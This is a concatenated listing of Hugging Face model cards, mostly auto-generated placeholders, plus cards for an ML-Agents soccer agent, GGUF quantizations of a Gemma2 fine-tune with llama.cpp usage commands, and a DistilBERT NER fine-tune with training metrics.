- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
iarchitarora/gemma2-Code-Instruct-Finetune-test | iarchitarora | 2024-10-10T12:47:26Z | 127 | 0 | transformers | [
"transformers",
"safetensors",
"gemma",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T12:42:48Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Juu24/poca-SoccerTwos | Juu24 | 2024-10-10T12:46:25Z | 35 | 0 | ml-agents | [
"ml-agents",
"tensorboard",
"onnx",
"SoccerTwos",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-SoccerTwos",
"region:us"
] | reinforcement-learning | 2024-10-10T12:45:16Z | ---
library_name: ml-agents
tags:
- SoccerTwos
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-SoccerTwos
---
# **poca** Agent playing **SoccerTwos**
This is a trained model of a **poca** agent playing **SoccerTwos**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how works ML-Agents:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Step 1: Find your model_id: Juu24/poca-SoccerTwos
3. Step 2: Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
nqzfaizal77ai/nqzora-twyla-geminox-init-510m | nqzfaizal77ai | 2024-10-10T12:45:41Z | 92 | 0 | transformers | [
"transformers",
"safetensors",
"gemma2",
"text-generation",
"base_model:google/gemma-2-2b",
"base_model:finetune:google/gemma-2-2b",
"license:gemma",
"autotrain_compatible",
"text-generation-inference",
"region:us"
] | text-generation | 2024-10-08T11:44:50Z | ---
library_name: transformers
inference: false
license: gemma
base_model:
- google/gemma-2-2b
---
change name pruned google/gemma-2-2b model into init model with new name to avoid trademark infringement
<img src="nqzora-twyla-geminox-cover.webp" alt="NQZora Twyla Geminox" style="width: 200px; height: 200px; margin-right:auto; margin-left:auto;">
Note: Image created with [Flux 1 schnell](https://huggingface.co/spaces/black-forest-labs/FLUX.1-schnell)
# New Quantum Zone Technology Model
NQZora Twyla Geminox
- Twyla a name that means "twilight" or "dual", implying a balance between two opposing forces.
- Geminox a combination of "Gemini" (representing duality and adaptability) and "nox" (Latin for night). It could reflect adaptability in learning and dual nature—knowledge in various forms. "Geminox" This name still retains the concept of duality and adaptability, but with a more mysterious and intriguing tone. It could symbolize the balance between old and new knowledge, or the interplay between different learning style.
- NQZora (combining "NQZ" with "zora", meaning "dawn" in Slavic languages, symbolizing a new beginning) |
Triangle104/Gemma2-Gutenberg-Doppel-9B-Q5_K_M-GGUF | Triangle104 | 2024-10-10T12:36:47Z | 13 | 0 | transformers | [
"transformers",
"gguf",
"llama-cpp",
"gguf-my-repo",
"dataset:jondurbin/gutenberg-dpo-v0.1",
"dataset:nbeerbower/gutenberg2-dpo",
"base_model:nbeerbower/Gemma2-Gutenberg-Doppel-9B",
"base_model:quantized:nbeerbower/Gemma2-Gutenberg-Doppel-9B",
"license:gemma",
"model-index",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T12:33:46Z | ---
base_model: nbeerbower/Gemma2-Gutenberg-Doppel-9B
datasets:
- jondurbin/gutenberg-dpo-v0.1
- nbeerbower/gutenberg2-dpo
library_name: transformers
license: gemma
tags:
- llama-cpp
- gguf-my-repo
model-index:
- name: Gemma2-Gutenberg-Doppel-9B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 71.71
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 41.08
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 3.47
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 10.63
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 17.3
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 34.75
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
---
# Triangle104/Gemma2-Gutenberg-Doppel-9B-Q5_K_M-GGUF
This model was converted to GGUF format from [`nbeerbower/Gemma2-Gutenberg-Doppel-9B`](https://huggingface.co/nbeerbower/Gemma2-Gutenberg-Doppel-9B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/nbeerbower/Gemma2-Gutenberg-Doppel-9B) for more details on the model.
---
Model details:
-
Gemma2-Gutenberg-Doppel-9B
UCLA-AGI/Gemma-2-9B-It-SPPO-Iter3 finetuned on jondurbin/gutenberg-dpo-v0.1 and nbeerbower/gutenberg2-dpo.
Method
ORPO finetuned using 2x A40 for 3 epochs.
Open LLM Leaderboard Evaluation Results
Detailed results can be found here
Metric Value
Avg. 29.82
IFEval (0-Shot) 71.71
BBH (3-Shot) 41.08
MATH Lvl 5 (4-Shot) 3.47
GPQA (0-shot) 10.63
MuSR (0-shot) 17.30
MMLU-PRO (5-shot) 34.75
---
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q5_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q5_k_m.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q5_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q5_k_m.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q5_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q5_k_m.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q5_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q5_k_m.gguf -c 2048
```
|
roncmic/distilbert-base-uncased-finetuned-ner | roncmic | 2024-10-10T12:35:52Z | 127 | 0 | transformers | [
"transformers",
"safetensors",
"distilbert",
"token-classification",
"generated_from_trainer",
"dataset:conll2003",
"base_model:distilbert/distilbert-base-uncased",
"base_model:finetune:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | token-classification | 2024-10-10T12:31:20Z | ---
library_name: transformers
license: apache-2.0
base_model: distilbert-base-uncased
tags:
- generated_from_trainer
datasets:
- conll2003
metrics:
- precision
- recall
- f1
- accuracy
model-index:
- name: distilbert-base-uncased-finetuned-ner
results:
- task:
name: Token Classification
type: token-classification
dataset:
name: conll2003
type: conll2003
config: conll2003
split: validation
args: conll2003
metrics:
- name: Precision
type: precision
value: 0.9258481600176816
- name: Recall
type: recall
value: 0.9372413021590782
- name: F1
type: f1
value: 0.9315098954858795
- name: Accuracy
type: accuracy
value: 0.983668800737128
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# distilbert-base-uncased-finetuned-ner
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on the conll2003 dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0606
- Precision: 0.9258
- Recall: 0.9372
- F1: 0.9315
- Accuracy: 0.9837
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
| Training Loss | Epoch | Step | Validation Loss | Precision | Recall | F1 | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:---------:|:------:|:------:|:--------:|
| 0.2412 | 1.0 | 878 | 0.0686 | 0.9041 | 0.9249 | 0.9144 | 0.9803 |
| 0.0519 | 2.0 | 1756 | 0.0596 | 0.9236 | 0.9339 | 0.9287 | 0.9831 |
| 0.0298 | 3.0 | 2634 | 0.0606 | 0.9258 | 0.9372 | 0.9315 | 0.9837 |
### Framework versions
- Transformers 4.45.2
- Pytorch 2.4.1
- Datasets 2.18.0
- Tokenizers 0.20.0
|
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-122522-distilled-reverse-0.5alpha | Trelis | 2024-10-10T12:31:05Z | 127 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T12:29:48Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
pranavdaware/web_ocr | pranavdaware | 2024-10-10T12:30:14Z | 19 | 0 | null | [
"safetensors",
"GOT",
"image-to-text",
"custom_code",
"hi",
"en",
"base_model:stepfun-ai/GOT-OCR2_0",
"base_model:finetune:stepfun-ai/GOT-OCR2_0",
"license:apache-2.0",
"region:us"
] | image-to-text | 2024-09-30T12:16:34Z |
---
license: apache-2.0
language:
- hi
- en
metrics:
- accuracy
base_model:
- stepfun-ai/GOT-OCR2_0
pipeline_tag: image-to-text
--- |
Triangle104/Gemma2-Gutenberg-Doppel-9B-Q4_K_M-GGUF | Triangle104 | 2024-10-10T12:22:21Z | 19 | 0 | transformers | [
"transformers",
"gguf",
"llama-cpp",
"gguf-my-repo",
"dataset:jondurbin/gutenberg-dpo-v0.1",
"dataset:nbeerbower/gutenberg2-dpo",
"base_model:nbeerbower/Gemma2-Gutenberg-Doppel-9B",
"base_model:quantized:nbeerbower/Gemma2-Gutenberg-Doppel-9B",
"license:gemma",
"model-index",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T12:20:06Z | ---
base_model: nbeerbower/Gemma2-Gutenberg-Doppel-9B
datasets:
- jondurbin/gutenberg-dpo-v0.1
- nbeerbower/gutenberg2-dpo
library_name: transformers
license: gemma
tags:
- llama-cpp
- gguf-my-repo
model-index:
- name: Gemma2-Gutenberg-Doppel-9B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 71.71
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 41.08
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 3.47
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 10.63
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 17.3
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 34.75
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
---
# Triangle104/Gemma2-Gutenberg-Doppel-9B-Q4_K_M-GGUF
This model was converted to GGUF format from [`nbeerbower/Gemma2-Gutenberg-Doppel-9B`](https://huggingface.co/nbeerbower/Gemma2-Gutenberg-Doppel-9B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/nbeerbower/Gemma2-Gutenberg-Doppel-9B) for more details on the model.
---
Model details:
-
Gemma2-Gutenberg-Doppel-9B
UCLA-AGI/Gemma-2-9B-It-SPPO-Iter3 finetuned on jondurbin/gutenberg-dpo-v0.1 and nbeerbower/gutenberg2-dpo.
Method
ORPO finetuned using 2x A40 for 3 epochs.
Open LLM Leaderboard Evaluation Results
Detailed results can be found here
Metric Value
Avg. 29.82
IFEval (0-Shot) 71.71
BBH (3-Shot) 41.08
MATH Lvl 5 (4-Shot) 3.47
GPQA (0-shot) 10.63
MuSR (0-shot) 17.30
MMLU-PRO (5-shot) 34.75
---
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q4_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q4_k_m.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q4_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q4_k_m.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q4_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q4_k_m.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q4_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q4_k_m.gguf -c 2048
```
|
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-120750-distilled-0.5alpha | Trelis | 2024-10-10T12:18:57Z | 126 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T12:09:31Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
